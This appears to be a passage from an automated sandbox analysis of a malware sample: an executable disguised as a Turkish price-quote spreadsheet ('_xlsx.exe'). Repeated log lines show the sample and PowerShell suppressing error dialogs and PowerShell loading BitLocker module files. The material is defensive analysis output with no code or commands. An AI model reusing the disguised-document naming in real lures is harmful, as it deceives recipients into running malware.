                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
